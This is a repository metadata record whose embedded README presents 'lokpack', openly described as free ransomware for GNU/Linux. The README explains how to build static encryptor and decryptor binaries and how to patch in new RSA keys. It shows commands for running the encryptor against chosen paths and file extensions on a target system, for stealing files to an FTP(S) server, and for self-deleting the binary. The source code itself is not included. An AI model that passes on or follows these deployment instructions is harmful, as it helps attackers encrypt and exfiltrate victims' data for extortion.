{"id":21130831,"url":"https://github.com/ngn13/lokpack","last_synced_at":"2025-07-20T22:06:13.881Z","repository":{"id":231389818,"uuid":"781668804","full_name":"ngn13/lokpack","owner":"ngn13","description":"ransomware tooling for GNU/Linux","archived":false,"fork":false,"pushed_at":"2025-06-03T21:55:45.000Z","size":185,"stargazers_count":11,"open_issues_count":0,"forks_count":3,"subscribers_count":2,"default_branch":"main","last_synced_at":"2025-07-09T01:45:34.438Z","etag":null,"topics":["linux-malware","linux-ransomware","ransomware","ransomware-resources","ransomware-source-code","rsa-encryption"],"latest_commit_sha":null,"homepage":"","language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ngn13.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2024-04-03T20:20:49.000Z","updated_at":"2025-06-23T11:56:40.000Z","dependencies_parsed_at":"2024-04-06T13:26:46.778Z","dependency_job_id":"7d0087ba-8e09-4a97-8fb3-0fb5dba770a2","html_url":"https://github.com/ngn13/lokpack","commit_stats":null,"previous_names":["ngn13/lokpack"],"tags_count":4,"template":false,"template_full_name":null,"purl":"pkg:github/ngn13/lokpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ngn13%2Flokpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ngn13%2Flokpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ngn13%2Flokpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ngn13%2Flokpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ngn13","download_url":"https://codeload.github.com/ngn13/lokpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ngn13%2Flokpack/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":266205072,"owners_count":23892394,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["linux-malware","linux-ransomware","ransomware","ransomware-resources","ransomware-source-code","rsa-encryption"],"created_at":"2024-11-20T05:39:48.323Z","updated_at":"2025-07-20T22:06:13.860Z","avatar_url":"https://github.com/ngn13.png","language":"C","funding_links":[],"categories":[],"sub_categories":[],"readme":"# lokpack | ransomware tooling for GNU/Linux\n\n[![Tests](https://github.com/ngn13/lokpack/actions/workflows/test.yml/badge.svg)](https://github.com/ngn13/lokpack/actions/workflows/test.yml)\n[![Release](https://github.com/ngn13/lokpack/actions/workflows/release.yml/badge.svg)](https://github.com/ngn13/lokpack/actions/workflows/release.yml)\n\nlokpack is a free ransomware for modern GNU/Linux systems, written in C\n\nhttps://github.com/user-attachments/assets/bc89fac8-8203-4e80-a270-b208ce8773d5\n\n## Features\n\n- Build static encryption and decryption tools\n- Steal files using a FTP(S) server\n- Specify custom target paths and extensions\n- Uncrackable encryption with 8192 bit RSA and AES-256\n- Fully multi-threaded\n\n## Tested on...\n\nLatest release is automatically tested weekly on the latest Ubuntu LTS using\ngithub actions. I also manually tested the latest release on the following\nsystems:\n\n- Arch Linux 2025-06-02, x86-64\n- Ubuntu 24.04.2 LTS (Noble Numbat), x86-64\n- FreeBSD 14.2-RELEASE, i386\n\nIf you experience issues on any GNU/Linux system, feel free to create an issue.\nThis project does not target BSD systems, however if you experience any issues\non popular BSD systems (FreeBSD, NetBSD, OpenBSD etc.) I can try to fix them as\nwell.\n\n## Installation\n\n### Binary builds\n\nBinary builds (automatically built with github actions) are published for each\nrelease. These releases contain static, cross-compiled built encryptor and\ndecryptor binaries with a randomly generated RSA key pair.\n\nEach release also contains a simple python(3) patch script, which you can use to\ngenerate a new RSA key pair and replace the pair contained in the binaries:\n\n```bash\n# make sure you have pycryptodome installed\npython3 patch.py\n```\n\n### From the source\n\nTo obtain the source code, download the\n[latest](https://github.com/ngn13/lokpack/releases/latest) release archive, or\nclone the repository and checkout the latest tag. **Do not use any other commit\nor branch** unless you are doing development.\n\n#### Setup\n\n- A GNU/Linux system, you may also be able to build on BSD systems\n- GCC, GNU make and other GNU build tools\n- curl (and headers)\n- OpenSSL (and headers)\n\n**If you want to cross-compile the binaries for a different system**, you'll\nwill need the cross-compilation tools for the target system. **If your distro\ndoes not package cross-compilation tools**, you can build them yourself. After\nbuilding them you should specify their paths with environment variables, for\nexample:\n\n```bash\nexport CC=/opt/cross/bin/x86_64-linux-gnu-gcc\nexport LD=/opt/cross/bin/x86_64-linux-gnu-ld\nexport AS=/opt/cross/bin/x86_64-linux-gnu-as\n```\n\nYou should also add path of the cross-compilation headers to the include path:\n\n```bash\nexport C_INCLUDE_PATH=/opt/cross/include\n```\n\n**If you want to static binaries**, you will also need static libraries of curl\nand OpenSSL. **If your distro does not package these**, you can build them\nyourself or use the automated build scripts:\n\n```bash\n./scripts/openssl.sh\n./scripts/curl.sh\n```\n\n#### Build\n\nFor a static build (requires static libraries) with a randomly generated RSA key\npair:\n\n```bash\n./scripts/build.sh -static\n```\n\nFor a local build (requires shared libraries) with a randomly generated RSA key\npair:\n\n```bash\n./scripts/build.sh -local\n```\n\nBoth of these should create the `encryptor` and the `decryptor` binaries at\n`dist/`.\n\nYou can also build the binaries with an hardcoded key pair, and later patch them\nusing the `patch.py` script, which is located under the scripts directory:\n\n```bash\nmake\ncd dist \u0026\u0026 python3 ../scripts/patch.py\n```\n\nThis also let's you customize different build options:\n\n```bash\nmake LP_QUEUE_MAX=400\n```\n\nYou can get a full list of these build options by running `make help`.\n\n## Usage\n\nAfter transferring `encryptor` to the target system, you can specify custom\noptions:\n\n```bash\n$ ./encryptor --help\n[*] Listing available options:\n    --threads   =\u003e Thread count for the thread pool\n    --paths     =\u003e Target paths (directories/files)\n    --exts      =\u003e Target file extensions\n    --ftp-url   =\u003e Address for the FTP(S) server\n    --ftp-user  =\u003e FTP(S) username\n    --ftp-pwd   =\u003e FTP(S) password\n    --no-ftp    =\u003e Disable stealing files with FTP(S)\n    --no-bar    =\u003e Disable simple ASCII progress bar\n    --destruct  =\u003e Self destruct (delete) the program\n```\n\nFor example to encrypt `.sql` and `.db` files located at `/var` and `/home`\nwithout FTP using 100 threads:\n\n```bash\n./encryptor --threads=100 --paths=/var,/home --exts=sql,db --no-ftp\n```\n\nIf you want to encrypt all files with all extensions, use the `--exts` options\nwith an empty value, so just `--exts=`.\n\nDecryptor does not have any options, you only need to specify a target directory\nor a file to decrypt. For example to decrypt all the encrypted files in `/var`,\nyou can run:\n\n```bash\n./decryptor /var\n```\n\n### Setting up FTP(S)\n\nFor an actual FTP(S) setup you should install and configure a FTP daemon such as\n`vsftpd`. But for testing you can use `pyftpdlib`:\n\n```bash\n# username and password are 'anonymous'\n# which is default for the encryptor\npython3 -m pyftpdlib -w\n# -w for write access\n```\n\n## Development\n\nAfter making any changes to the source code, make sure the format the code and\ncheck for any linting errors (requires a recent version of `clang-format` and\n`clang-tidy`):\n\n```bash\nmake format # fix formatting\nmake check # check for formatting and linting errors\n```\n\nMake sure the fix any reported issues. Also make sure to test the binaries using\nthe `scripts/test.sh` script (requires `openssl` and `pyftpdlib`):\n\n```bash\nmake test\n```\n\nIf you experience any issues, enable the debug messages, compile the binaries\nwith debug messages. This might help you to quickly spot the issue:\n\n```bash\nmake LP_DEBUG=1 # uses hardcoded key pair\n# or...\n./scripts/build.sh -debug # uses random key pair\n```\n\nAlso if you want to submit any changes, feel free to create a pull request. Just\nmake sure to target the `dev` branch instead of `main`.\n\n---\n\nDon't do crime!\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fngn13%2Flokpack","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fngn13%2Flokpack","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fngn13%2Flokpack/lists"}